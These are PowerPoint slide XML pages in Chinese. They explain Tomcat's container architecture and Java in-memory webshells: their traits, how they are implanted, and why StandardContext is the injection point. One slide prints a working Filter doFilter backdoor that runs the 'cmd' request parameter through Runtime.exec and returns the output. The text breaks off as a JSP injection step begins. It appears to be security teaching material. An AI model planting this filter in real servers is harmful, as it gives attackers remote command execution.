            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="154305" y="1524635"/>
            <a:ext cx="6795770" cy="3808730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6950075" y="1321435"/>
            <a:ext cx="4537710" cy="4993005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Catalina负责管理Server；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Server表示整个服务器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Server中有多个服务Service</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>每个服务Service包含着多个Coyote实现的连接器组件Connector和一个容器组件Container</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5441950" cy="2421890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Engine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>表示整个Catalina的Servlet引擎</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>用来管理多个虚拟站点,一个Service最多只能有一个Engine,但是一个Engine可以包含多个Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：表示一个主机或者是一个虚拟站点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>可以给Tomcat配置多个虚拟主机地址,一个虚拟主机地址下可以包含多个Context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76835" y="3855720"/>
            <a:ext cx="6409690" cy="2565400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5596890" y="1284605"/>
            <a:ext cx="6163310" cy="2359660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6609080" y="3855720"/>
            <a:ext cx="4886325" cy="2459355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Context：表示一个web应用程序</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一个尾部应用程序可以包含多个Wrapper</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Wrapper：表示一个Servlet容器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Wrapper作为容器中的最底层,不可以包含子容器</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4627245" cy="5100955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>在Tomcat的整体架构中,各个组件之间是松耦合的,确保了整体架构的伸缩性和扩展性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Container采用责任链模式完成具体的请求处理,来保证灵活性和扩展性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>在Tomcat中定义了Pipeline和Vavle两个接口:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>Pipeline: 构建责任链</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>Valve: 代表责任链上的每一个处理器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>Pipeline中维护了一个基础的Valve, 即StandardXxxValve. 始终位于Pipeline的末端,在最后执行,封装了具体的请求处理和输出响应过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>可以调用addVavle()方法为Pipeline添加自定义的Valve, 自定义添加的Valve位于末尾的基础Valve之前,并且按照添加顺序执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>Pipeline通过获取首个Valve来启动整个责任链的执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4719955" y="1214120"/>
            <a:ext cx="6495415" cy="5297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5734685" y="1400175"/>
            <a:ext cx="6120765" cy="4483735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="154305" y="1792605"/>
            <a:ext cx="5410835" cy="3943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endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="699770" y="1214120"/>
            <a:ext cx="8497570" cy="5296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zh-CN" altLang="en-US" b="1"/>
              <a:t>内存马的本质：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、以内存方式存在的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>组件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、携带恶意功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(Payload)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，完成攻击者意图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>植入马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>内存马的特性：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、隐蔽性强：由于不存在于硬盘上，常规的文件系统检查无法发现内存马</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、实时性：内存马一旦植入，便可在系统启动时自动加载，无需等待文件系统挂载</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、依赖性：内存马通常依赖于特定的系统漏洞或配置错误，一旦修复这些漏洞，内存马就失效</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>内存马植入方式：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>​1、基于容器组件来实现，被修改后其带恶意功能,修改掉组件，执行了恶意功能又返回</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>​2、将容器调用链中，向其新增自己的恶意组件，比如 监听器-过滤器-响应器 变为 监听器-过滤器-恶意响应器—响应器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>​3、漏洞注入内存马 利用服务器上的安全漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>​4、API注入内存马 滥用或误用应用程序提供的API接口，通过它们上传或执行恶意代码，从而在服务器内存中植入后门或木马程序</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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zh-CN" altLang="en-US" b="1"/>
              <a:t>关于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>涉及的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中有三个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：分别为StandardContext、ApplicationContext、ServletContext；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ServletContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是javax.servlet包下是一个接口，它的本意是可以对某个Web应用的各种资源和功能进行访问，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所以一般的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>都要实现这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接口，一般通过request.getServletContext()获得。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ApplicationContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：是对ServerletContext接口的实现类，实现了ServletContext规范定义的一些方法，例如addServlet,addFilter等，其实该类被包装在ApplicationContextFacade类中，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ApplicationContextFacade包装的目的是想通过门面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模式简化对上下文的操作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>StandardContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实际干活的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：org.apache.catalina.Context接口的默认实现为StandardContext，而Context在Tomcat中代表一个web应用。ApplicationContext所实现的方法其实都是调用的StandardContext中的方法，StandardContext是Tomcat中真正起作用的Context。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>向框架注入内存马的基础，就是要获得context，context实际上就是拥有当前中间件或框架处理请求、保存和控制servlet对象、保存和控制filter对象等功能的对象。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>而根据上述的信息可以知道，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>StandardContext是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实现动态注入马的入口！！</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r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的内存马</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en-US" altLang="zh-CN" b="1"/>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>内存马：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果想在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中增加恶意代码那么只需要在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>doFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法上增加如下代码即可：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>        if (request.getParameter("cmd") != null){</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>  Process exec = Runtime.getRuntime().exec(request.getParameter("cmd"));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>            InputStream inputStream = exec.getInputStream();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>            Scanner scanner = new Scanner(inputStream).useDelimiter("\\A");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>            String output = scanner.hasNext() ? scanner.next() : "";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>            response.getWriter().write(output);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>            response.getWriter().flush();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>        }        </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>           chain.doFilter(request,response);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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zh-CN" altLang="en-US"/>
              <a:t>上面利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>doFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法写入了一个恶意类，那么如何找到注入点来动态的在内存中创建一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对象，来实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的内存马呢？可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作为载体在</a:t>
            </a:r>
            <a:r>
